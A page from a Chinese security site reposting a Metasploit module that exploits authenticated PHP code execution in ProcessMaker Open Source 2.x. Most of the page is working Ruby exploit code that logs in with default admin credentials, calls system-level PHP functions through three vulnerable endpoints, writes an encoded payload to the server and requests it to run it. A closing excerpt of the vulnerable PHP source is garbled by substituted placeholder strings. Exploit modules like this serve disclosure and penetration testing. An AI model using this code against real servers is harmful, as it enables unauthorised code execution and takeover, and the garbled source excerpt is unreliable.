首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ProcessMaker Open Source Authenticated PHP Code Execution
来源:metasploit.com 作者:Coles 发布时间:2013-10-31  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ProcessMaker Open Source Authenticated PHP Code Execution",
      'Description'    => %q{
        This module exploits a PHP code execution vulnerability in the
        'neoclassic' skin for ProcessMaker Open Source which allows any
        authenticated user to execute PHP code. The vulnerable skin is
        installed by default in version 2.x and cannot be removed via
        the web interface.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
      'References'     =>
        [
          ['URL'       => 'http://bugs.processmaker.com/view.php?id=13436']
        ],
      'Payload'        =>
        {
          'Space'      => 8190, # HTTP POST
          'DisableNops'=> true,
          'BadChars'   => "\x00"
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          # Tested on:
          # * Windows XP SP3 - ProcessMaker Open Source version 2.5.1, 2.5.0, 2.0.23
          # * Debian Linux   - ProcessMaker Open Source version 2.0.45
          ['ProcessMaker Open Source 2.x (PHP Payload)', { 'auto' => true }]
        ],
      'Privileged'     => false, # Privileged on Windows but not on *nix targets
      'DisclosureDate' => 'Oct 24 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME',  [true, 'The username for ProcessMaker', 'admin']),
        OptString.new('PASSWORD',  [true, 'The password for ProcessMaker', 'admin'])
      ], self.class)
  end

  #
  # Send command for execution
  #
  def execute_command(cmd, opts = { :php_function => 'system' } )
    # random vulnerable path # confirmed in versions 2.0.23 to 2.5.1
    vuln_url = [
      '/sysworkflow/en/neoclassic/appFolder/appFolderAjax.php',
      '/sysworkflow/en/neoclassic/cases/casesStartPage_Ajax.php',
      '/sysworkflow/en/neoclassic/cases/cases_SchedulerGetPlugins.php'
    ].sample

    # shuffle POST parameters
    vars_post = Hash[{
      'action' => opts[:php_function],
      'params' => cmd
    }.to_a.shuffle]

    # send payload
    vprint_status("#{peer} - Attempting to execute: #{cmd}")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, vuln_url),
      'cookie'    => @cookie,
      'vars_post' => vars_post
    })
    res
  end

  #
  # Login
  #
  def login(user, pass)
    # shuffle POST parameters
    vars_post = Hash[{
      'form[USR_USERNAME]' => Rex::Text.uri_encode(user, 'hex-normal'),
      'form[USR_PASSWORD]' => Rex::Text.uri_encode(pass, 'hex-normal'),
    }.to_a.shuffle]

    # send login request
    print_status("#{peer} - Authenticating as user '#{user}'")
    begin
      res = send_request_cgi({
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path, "/sysworkflow/en/neoclassic/login/authentication.php"),
        'cookie'    => @cookie,
        'vars_post' => vars_post
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      print_error("#{peer} - Connection failed")
      return false
    end
    if res and res.code == 200 and res.body =~ /Loading styles and images/
      print_good("#{peer} - Authenticated as user '#{user}'")
      return true
    else
      print_error("#{peer} - Authenticating as user '#{user}' failed")
      return false
    end
  end

  #
  # Check credentials are valid and confirm command execution
  #
  def check
    # login
    @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
    unless login(datastore['USERNAME'], datastore['PASSWORD'])
      return Exploit::CheckCode::Unknown
    end

    # send check
    fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10)
    print_status("#{peer} - Sending check")
    begin
      res = execute_command("echo #{fingerprint}")
      if res and res.body =~ /#{fingerprint}/
        return Exploit::CheckCode::Vulnerable
      elsif res
        return Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      print_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown
  end

  #
  # Write payload to filesystem
  #
  def upload
    # Random PHP function for command execution
    php_function = [
      'exec',
      'shell_exec',
      'passthru',
      'system'
    ].sample

    # upload payload
    code = "<?php #{payload.encoded} ?>"
    print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)")
    begin
      res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } )
      if res and res.code == 200
        print_good("#{peer} - Payload sent successfully")
        register_files_for_cleanup(@fname)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
    end
  end

  def exploit
    # login
    @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
    unless login(datastore['USERNAME'], datastore['PASSWORD'])
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
    end

    # upload payload
    @fname  = "#{rand_text_alphanumeric(rand(10)+10)}.php"
    upload

    # execute payload
    print_status("#{peer} - Retrieving file '#{@fname}'")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")})
  end
end

#
# Source
#
=begin appFolder/appFolderAjax.php
22:if ((
___FCKpd___0
REQUEST['action']) != 'rename') { 23: $functionName =
___FCKpd___0
REQUEST ['action']; 24: $functionParams = isset (
___FCKpd___0
REQUEST ['params']) ?
___FCKpd___0
REQUEST ['params'] : array (); 26: $functionName ($functionParams); =end =begin cases/casesStartPage_Ajax.php 16:$functionName =
___FCKpd___0
REQUEST['action']; 18:$functionParams = isset(
___FCKpd___0
REQUEST['params'] ) ?
___FCKpd___0
REQUEST['params'] : array (); 19:$functionName( $functionParams ); =end =begin cases/cases_SchedulerGetPlugins.php 16:$functionName =
___FCKpd___0
REQUEST['action']; 18:$functionParams = isset(
___FCKpd___0
REQUEST['params'] ) ?
___FCKpd___0
REQUEST['params'] : array (); 19:$functionName( $functionParams ); =end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache / PHP Remote Command Ex
·Beetel Connection Manager NetC
·sup Remote Command Execution
·Moodle Remote Command Executio
·Apache / PHP 5.x Remote Code E
·OpenMediaVault Cron Remote Com
·WatchGuard Firewall XTM 11.7.4
·ISPConfig Authenticated Arbitr
·WatchGuard Firewall XTM 11.7.4
·Zabbix Authenticated Remote Co
·Netgear ReadyNAS Remote Comman
·NAS4Free Arbitrary Remote Code
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved